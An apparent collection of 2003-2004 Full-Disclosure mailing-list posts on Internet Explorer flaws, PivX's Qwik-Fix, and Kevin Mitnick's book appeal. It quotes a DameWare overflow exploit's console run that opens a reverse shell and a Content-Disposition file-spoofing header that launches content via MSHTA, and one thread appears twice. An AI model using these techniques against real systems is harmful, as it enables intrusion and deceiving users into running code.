http://www.securitytracker.com/alerts/2003/Jun/1007072.html etc.. etc.. etc.. please tell me what registryhacks you applied to stop those ;) What you are suggesting only stops one very specific class of exploits - It doesn't prevent buffer / heap / integer overflow attacks - It doesn't stop stealing of session data, which *IS* a big deal in a world where more and more applications are getting to be webbased. - It doesn't protect you against broken certificate handling Posts like this give people a false sense of security, just run our magical little program and click your heels twice and all the issues will just fade a way. Thats not the way it works. At best it adds a layer of security > However, changing the Internet Explorer security zone settings is not a > nimble task. Despite being partly split after IE4, the functionality of > Windows Explorer and Internet Explorer is still very tightly interwoven. > If you are not careful you WILL cause your system to malfunction and no > longer open Explorer folders, launch applications or even boot into > Windows properly. You need to strike a very sensible balance. > > During the course of our research, we crafted and tested solutions to > this problem on tens of thousands of installations and have beta tested > on thousands of users, and have incorporated the results into our FREE > constantly updated Proactive Threat Mitigation application that goes by > the name of Qwik-Fix(r) ( www.pivx.com/qwikfix/ ). Our beta users were > never affected by Blaster, HTAExploit or MiMail - to name a few. Seems valueble would you concider writing a whitepaper / howto on the subject ? > > Now, let's analyze the vulnerabilities Liu Die Yu posted on November > 25th [2], as there was not much details in the post. > > "1stCleanRc" is not a vulnerability of its own, but an example exploit > detailing how to combine the "MhtRedirParsesLocalFile", > "BackToFramedJpu" and "MhtRedirLaunchInetExe" vulnerabilities. The same > goes for "execdror6" which is an example exploit that relies on the > "LocalZoneInCache" vulnerability, as well as "LocalZoneInCache" which is > a demonstration of using "threadid10008". > > This leaves us with 5 vulnerabilities to analyze: > > MhtRedirParsesLocalFile is designed to display and parse a locally > residing file of any plaintext format in an IFRAME. On most of our > installations we could only reproduce the display part. Still, being > able to display a locally residing file in a window object is > specifically prohibited by IE6 SP1. I wouldn't classify this one as a vulnerability, it's just a variation o what mindwarper reported he reported that setting the moved temprarily header with an Location forces parsing of the local file now there are a couple of ways to force a redirect, your what mindwarper used, your plain vanilla http redirect, and pointing to a non existant mht file. Enumerating all possibilities does not constitute a new vulnerability each and everytime, its like saying, woohoo also works :-o , well duh offcourse it does, but it remains the same iussue > MhtRedirLaunchInetExe expands a bit on the capabilities of the codeBase > vulnerability. Microsoft fixed codeBase in the Internet Zone, but left > it in the My Computer zone. As such, MhtRedirLaunchInetExe simply makes > it one step easier to bundle HTML, Script and executable payload in the > same file. > > BackToFramedJpu lets you inject javascript URLs into the history and > have them executed in the context of the target window object. > > HijackClickV2 lets you hijack clicks and target them at some system > dialogs. You will have to know the location of those. > > Threadid10008 is intended to download an HTML file to the TIF and > subsequently display and parse it. It could not be reproduced on all our > systems, but
Re: [Full-Disclosure] Internet Explorer JavaScript insecure function
>I discovered a javascript function (interpreted by Internet Explorer) called "file.writeline()" may be >potentially dangerous for Internet Explorer users. This function allows to write files by means of >JavaScript on a hard disk. http://archives.neohapsis.com/archives/win2ksecadvice/2000-q4/0010.html It could be that you are using an old version of IE and independantly redicovered this vulnerability but I sincerely doubt it, especially since you refer to the issue as being in a javascript function, when it was infact the possibilty to create an activex objects that was the issue ( writeline is a method of the filesystem activex object) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] The *real* reason the pivx unpatched IE flaws page was taken offline?
On 12 october PIVX removed the IE unpatched IE flaws page "for the good of the internet as a whole" http://slashdot.org/article.pl?sid=03/10/12/2221205&mode=thread&tid=109&tid=126&tid=128&tid=172&tid=187 Now looking thru the pivx client list http://www.pivx.com/clients.html the *real* reason becomes blantantly obvious.
Re: [Full-Disclosure] Microsoft's plans for making XP more secure
Just had a look, the IE part really looks awsome, it appears they had a long hard look at what kind of stuff people have been throwing at it. And came up with some nice solutions, If this really is followed thru upon I think we'll see a *drastic* decrease in internet explorer vulnerabilities in general and an even more drastic decrease in vulns of the critical kind, the object caching stuff alone was good for something like 25 issues over the last years. (a testament to the intense stupidity of the implementation of that particular feature), Anyway it's nice to see that microsoft is making some proactive changes rather than just keep on patching endless stream of holes - Original Message - From: "Richard M. Smith" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, December 16, 2003 5:26 PM Subject: [Full-Disclosure] Microsoft's plans for making XP more secure > Microsoft has just released a document describing the changes they will be > making in service pack 2 to make Windows XP more secure. Many of the > interesting changes are in Internet Explorer. The attached links provide > the details. > > Richard M. Smith > http://www.ComputerBytesMan.com > > > > Changes to Functionality in Microsoft Windows XP Service Pack 2 > > http://tinyurl.com/z0rv > > In Microsoft Windows XP Service Pack 2, Microsoft is introducing a set of > security technologies that will help to improve the ability of Windows > XP-based computers to withstand malicious attacks from viruses and worms. > The technologies include network protection, memory protection, safer e-mail > handling, more secure browsing, and improved computer maintenance. > > Together, these security technologies will help to make it more difficult to > attack Windows XP, even if the latest updates are not applied. These > security technologies together are particularly useful in mitigation against > worms and viruses. > > This document specifically focuses on the changes between earlier versions > of Windows XP and Windows XP Service Pack 2 and reflects Microsoft's early > thinking about Service Pack 2 and its implications for developers. Examples > and details are provided for several of the technologies that are > experiencing the biggest changes. Future versions of this document will > cover all new and changed technologies. > > http://tinyurl.com/z2zv > > . Safer e-mail handling. Security technologies help to stop viruses > (such as SoBig.F) that spread through e-mail and instant messaging. These > technologies include default settings that are more secure, improved > attachment control for Outlook Express and Windows Messenger, and increased > Outlook Express security and reliability. As a result, potentially unsafe > attachments that are sent through e-mail and instant messages are isolated > so that they cannot affect other parts of the system. > > . More secure browsing. Security technologies that are delivered in > Microsoft Internet Explorer provide improved protection against malicious > content on the Web. One enhancement includes locking down the Local Machine > zone to prevent against the running of malicious scripts and fortifying > against harmful Web downloads. Additionally, better user controls and user > interfaces are provided that help prevent malicious ActiveXR controls and > spyware from running on customers' systems without their knowledge and > consent. > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
If this is legit from a /. interview : --snip-- John Markoff had first libeled me in his book, Cyperpunk, which he co-authored with his former wife, Katie Hafner. In and around 1990, Markoff and Hafner contacted me to request my participation for a book about three hackers, including myself. In considering their request, I asked about their budget to compensate me for my time and/or life story rights. Both Markoff and Hafner were unwilling to compensate me as a source, because it was unethical. I explained that it was unethical for me to give them my story for free. We were at an impasse --snip-- from the site : --snip-- If your story makes it into the book, you'll receive a free copy of my first book, The Art of Deception, plus a rare Advanced Reader's Copy of the new one with your story in it -- both signed by me with a personal inscription to you in your real name or your handle or pseudonym. --snip-- Thats definatly more ethical ;) - Original Message - From: "Kevin Mitnick" <[EMAIL PROTECTED]> To: "'Adik'" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Saturday, December 20, 2003 12:30 AM Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit > Hi all! > > > I'm sorry for my absence from the list for the past few months, but I have > been very busy traveling outside the US, and my mail account was > experiencing problems. Now that I am receiving the messages again, I have > been playing "catch up," by reading the old posts. > > I do have some good news, and was hoping that some of you might be able to > assist me. I have been commissioned by Wiley & Sons to write a second book, > which is tentatively titled, "The Art of Intrusion." This book will > chronicle detailed accounts of real, untold hacks by the perpetrators who > did it, and I will provide a security analysis and described how the attack > could be mitigated/prevented in today's environment. I am going to tell the > story from the perpetrator's stance, not just from research obtained from > law enforcement officials and records. > > I am looking for former/retired hackers that would be willing to tell me the > details of their sexiest hack. I am not interested in the run-of-the-mill > attacks such as, exploiting RPC DCOM, but rather creative ones that > incorporated technical, physical and/or social engineering aspects. > > > > I am offering $500 for the most provocative story that makes it into the > book, and if the person wishes, we can protect their anonymity by the use of > a handle. All contributors selected for the book, will receive a copy of > both books autographed by the authors. > > I should have more information up on FreeKevin.com today, as well as > DefensiveThinking.com. If someone would like to contact me with a story or > a possible lead on a storyteller, please write to me at > [EMAIL PROTECTED], or call at (310)689-7229. I would appreciate > any assistance you can offer. > > All my best, > > > > Kevin Mitnick > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Adik > Sent: Friday, December 19, 2003 8:38 AM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server > Overflow Exploit > > DameWare Mini Remote Control Server Exploit > > C:\xploits\dmware>dmware > > ...oO DameWare Remote Control Server Overflow Exploit Oo... > > -( by Adik netmaniac[at]hotmail.KG )- > > - Versions vulnerable: <= DWRCS 3.72.0.0 > - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 > > Usage: dmware > eg: dmware 10.0.0.1 6129 10.0.0.2 21 > > > C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53 > > ...oO DameWare Remote Control Server Overflow Exploit Oo... > > -( by Adik netmaniac[at]hotmail.KG )- > > - Versions vulnerable: <= DWRCS 3.72.0.0 > - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 > > [*] Target IP: 192.168.63.130 Port: 6129 > [*] Local IP: 192.168.63.1Listening Port: 53 > > [*] Initializing sockets... [ OK ] > [*] Binding to local port: 53...[ OK ] > [*] Setting up a listener...[ OK ] > > OS Info : WIN2000 [ver 5.0.2195] > SP String : Service Pack 3 > > EIP: 0x77db912b (advapi32.dll) > > [*] Constructing packet for WIN 2000 SP: 3... [ OK ] > [*] Connecting to 192.168.63.130:6129...[ OK ] > [*] Packet injected! > [*] Connection request accepted: 192.168.63.130:1056 > [*] Dropping to shell... > > Microsoft Windows 2000 [Version 5.00.2195] > (C) Copyright 1985-2000 Microsoft Corp. > > C:\WINNT\system32>exit > exit > [x] Connection closed. > > C:\xploits\dmware> > > -- > cheerz, > > Adik > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ F
Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
In that case you probably will want to update your site http://www.defthi.com/main/CallforHackers.html since it mentions another arangement - Original Message - From: "Kevin Mitnick" <[EMAIL PROTECTED]> To: "'Jelmer'" <[EMAIL PROTECTED]>; "'Adik'" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Saturday, December 20, 2003 1:56 AM Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit > The difference is that I'm offer a $500 for the best story of a single hack, > and I'm willing to pay $200 for each story that makes the final draft. > > Markoff would not agree to pay one dime. > > Cheers, > > Kevin Mitnick > > Check out http://www.zdnet.com.au for the story > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Jelmer > Sent: Friday, December 19, 2003 4:03 PM > To: Kevin Mitnick; 'Adik'; [EMAIL PROTECTED]; > [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control > Server Overflow Exploit > > If this is legit > > from a /. interview : > > --snip-- > John Markoff had first libeled me in his book, Cyperpunk, which he > co-authored with his former wife, Katie Hafner. In and around 1990, Markoff > and Hafner contacted me to request my participation for a book about three > hackers, including myself. In considering their request, I asked about their > budget to compensate me for my time and/or life story rights. Both Markoff > and Hafner were unwilling to compensate me as a source, because it was > unethical. I explained that it was unethical for me to give them my story > for free. We were at an impasse > --snip-- > > from the site : > > --snip-- > If your story makes it into the book, you'll receive a free copy of my first > book, The Art of Deception, plus a rare Advanced Reader's Copy of the new > one with your story in it -- both signed by me with a personal inscription > to you in your real name or your handle or pseudonym. > --snip-- > > Thats definatly more ethical ;) > > > - Original Message - > From: "Kevin Mitnick" <[EMAIL PROTECTED]> > To: "'Adik'" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; > <[EMAIL PROTECTED]> > Sent: Saturday, December 20, 2003 12:30 AM > Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control > Server Overflow Exploit > > > > Hi all! > > > > > > I'm sorry for my absence from the list for the past few months, but I have > > been very busy traveling outside the US, and my mail account was > > experiencing problems. Now that I am receiving the messages again, I have > > been playing "catch up," by reading the old posts. > > > > I do have some good news, and was hoping that some of you might be able to > > assist me. I have been commissioned by Wiley & Sons to write a second > book, > > which is tentatively titled, "The Art of Intrusion." This book will > > chronicle detailed accounts of real, untold hacks by the perpetrators who > > did it, and I will provide a security analysis and described how the > attack > > could be mitigated/prevented in today's environment. I am going to tell > the > > story from the perpetrator's stance, not just from research obtained from > > law enforcement officials and records. > > > > I am looking for former/retired hackers that would be willing to tell me > the > > details of their sexiest hack. I am not interested in the run-of-the-mill > > attacks such as, exploiting RPC DCOM, but rather creative ones that > > incorporated technical, physical and/or social engineering aspects. > > > > > > > > I am offering $500 for the most provocative story that makes it into the > > book, and if the person wishes, we can protect their anonymity by the use > of > > a handle. All contributors selected for the book, will receive a copy of > > both books autographed by the authors. > > > > I should have more information up on FreeKevin.com today, as well as > > DefensiveThinking.com. If someone would like to contact me with a story > or > > a possible lead on a storyteller, please write to me at > > [EMAIL PROTECTED], or call at (310)689-7229. I would appreciate > > any assistance you can offer. > > > > All my best, > > > > > > > > Kevin Mitnick > > > > -Original Message- > > From: [EMAIL PROTECTED] > > [mailto:[EMAIL PROTECTED] On
Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6
Good boy here's a cookie
- Original Message -
From: "Thor Larholm" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Wednesday, January 28, 2004 1:16 AM
Subject: Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet
Explorer 6
> You're not very detailed about what happens behind the curtain, so here
> goes :)
>
> When an HTTP request returns its data, IE tries to determine the MIME
> type based on several factors [0]. In this case, IE determines that it
> cannot render the data as HTML since there is a Content-Disposition
> header - Content-Disposition is used whenever you e.g. output a binary
> file from a serverside script and want the filename to be displayed as
> "ProjectScope.doc" instead of "download.php" (your scripts name).
>
> The Content-Disposition HTTP header itself is not to blame, it is a
> standard MIME header from RFC 1806 that has been widely implemented in
> all browsers precisely to allow arbitrary filenaming.
>
> Since IE cannot display the data itself, it displays the Open/SaveAs
> dialog box so that the user can decide. The %2E in the filename is URL
> decoded and displayed as a . (dot) in the dialog. This URL decoding
> should simply not be performed as we are dealing with a file dialog and
> not a URL dialog, if %2E had not been decoded we would not be having
> this issue.
>
> Whatever action the user takes is then handled by Windows Explorer, we
> are now no longer dealing with IE. Windows Explorer determines what
> application to open the data with based on lesser rules than Internet
> Explorer, for one it does not look at the Content-Type header since it
> does not know about it. The first step of action is to compare the file
> extensions, only in the case of an unknown file extension does Windows
> Explorer perform its "magic filetype" guessing by inspecting the files
> content.
>
> The file extension in Windows is no longer limited to 3 characters,
> though historical reasons have kept most application extensions confined
> to these. Windows Explorer parses the filename, excluding its path, and
> determines that the file extension is everything following the last .
> (dot) character, in this case ".{GUID}%2Efunny.mpeg". Common extensions
> are either a set of printable characters or a GUID, with the latter
> having priority over the former. After this, a lookup is performed in
> the registry for HKCR\CLSID\.GUID and HKCR\.EXT, with EXT being the file
> extension that we discovered and GUID the CLSID we found, and a match is
> found for the GUID prior to the entire file extension. The GUID points
> at "HTML Application" which points at MSHTA.EXE, which is then used to
> display the data.
>
> As with the ".Folder" issue, this definitely eases social engineering.
> Internet Explorer should not URL decode strings for file dialogs and
> Windows Explorer should not give precedence to CLSID's.
>
>
> [0]
> http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_
> a.asp
>
>
>
> Regards
>
> Thor Larholm
> Senior Security Researcher
> PivX Solutions
> 24 Corporate Plaza #180
> Newport Beach, CA 92660
> http://www.pivx.com
> [EMAIL PROTECTED]
> Phone: +1 (949) 231-8496
> PGP: 0x5A276569
> 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
>
> PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
> Qwik-Fix
>
> - Original Message -
> From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, January 27, 2004 9:28 AM
> Subject: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet
Explorer
> 6
>
>
> >
> >
> > Tuesday, January 27, 2004
> >
> > Trivial file spoofing in Internet Explorer 6.0.2800.1106 and all
> > of 'its' patches to date on WIN XP [probably others]:
> >
> > Content-Disposition: attachment; filename=malware.{3050f4d8-98B5-
> > 11CF-BB82-00AA00BDCE0B}fun_ball_gites_pie_throw%2Empeg"
> >
> > Absolute bare minimum working demo [perhaps even feeble] as we
> > are absolutely confident the self-appointed resident gooroo will
> > be along shortly handing out packets of two cents to everyone
> > thus saving us the effort to illustrate in even greater detail
> > to those lacking imagination:
> >
> >
> > http://www.malware.com/gooroo.html
> >
> >
> >
> > End Call
> >
> > --
> > http://www.malware.com
> >
> >
> >
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6
Good boy here's a cookie
- Original Message -
From: "Thor Larholm" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Wednesday, January 28, 2004 1:16 AM
Subject: Re: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet
Explorer 6
> You're not very detailed about what happens behind the curtain, so here
> goes :)
>
> When an HTTP request returns its data, IE tries to determine the MIME
> type based on several factors [0]. In this case, IE determines that it
> cannot render the data as HTML since there is a Content-Disposition
> header - Content-Disposition is used whenever you e.g. output a binary
> file from a serverside script and want the filename to be displayed as
> "ProjectScope.doc" instead of "download.php" (your scripts name).
>
> The Content-Disposition HTTP header itself is not to blame, it is a
> standard MIME header from RFC 1806 that has been widely implemented in
> all browsers precisely to allow arbitrary filenaming.
>
> Since IE cannot display the data itself, it displays the Open/SaveAs
> dialog box so that the user can decide. The %2E in the filename is URL
> decoded and displayed as a . (dot) in the dialog. This URL decoding
> should simply not be performed as we are dealing with a file dialog and
> not a URL dialog, if %2E had not been decoded we would not be having
> this issue.
>
> Whatever action the user takes is then handled by Windows Explorer, we
> are now no longer dealing with IE. Windows Explorer determines what
> application to open the data with based on lesser rules than Internet
> Explorer, for one it does not look at the Content-Type header since it
> does not know about it. The first step of action is to compare the file
> extensions, only in the case of an unknown file extension does Windows
> Explorer perform its "magic filetype" guessing by inspecting the files
> content.
>
> The file extension in Windows is no longer limited to 3 characters,
> though historical reasons have kept most application extensions confined
> to these. Windows Explorer parses the filename, excluding its path, and
> determines that the file extension is everything following the last .
> (dot) character, in this case ".{GUID}%2Efunny.mpeg". Common extensions
> are either a set of printable characters or a GUID, with the latter
> having priority over the former. After this, a lookup is performed in
> the registry for HKCR\CLSID\.GUID and HKCR\.EXT, with EXT being the file
> extension that we discovered and GUID the CLSID we found, and a match is
> found for the GUID prior to the entire file extension. The GUID points
> at "HTML Application" which points at MSHTA.EXE, which is then used to
> display the data.
>
> As with the ".Folder" issue, this definitely eases social engineering.
> Internet Explorer should not URL decode strings for file dialogs and
> Windows Explorer should not give precedence to CLSID's.
>
>
> [0]
> http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_
> a.asp
>
>
>
> Regards
>
> Thor Larholm
> Senior Security Researcher
> PivX Solutions
> 24 Corporate Plaza #180
> Newport Beach, CA 92660
> http://www.pivx.com
> [EMAIL PROTECTED]
> Phone: +1 (949) 231-8496
> PGP: 0x5A276569
> 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
>
> PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
> Qwik-Fix
>
> - Original Message -
> From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, January 27, 2004 9:28 AM
> Subject: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet
Explorer
> 6
>
>
> >
> >
> > Tuesday, January 27, 2004
> >
> > Trivial file spoofing in Internet Explorer 6.0.2800.1106 and all
> > of 'its' patches to date on WIN XP [probably others]:
> >
> > Content-Disposition: attachment; filename=malware.{3050f4d8-98B5-
> > 11CF-BB82-00AA00BDCE0B}fun_ball_gites_pie_throw%2Empeg"
> >
> > Absolute bare minimum working demo [perhaps even feeble] as we
> > are absolutely confident the self-appointed resident gooroo will
> > be along shortly handing out packets of two cents to everyone
> > thus saving us the effort to illustrate in even greater detail
> > to those lacking imagination:
> >
> >
> > http://www.malware.com/gooroo.html
> >
> >
> >
> > End Call
> >
> > --
> > http://www.malware.com
> >
> >
> >
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
similar to http://www.securityfocus.com/archive/1/248143 http://www.greymagic.com/adv/gm008-ie/http://www.guninski.com/wmp-desc.html no biggie --- snip --
Sub loadIt(filename)
LoadPicture(filename)
End Sub
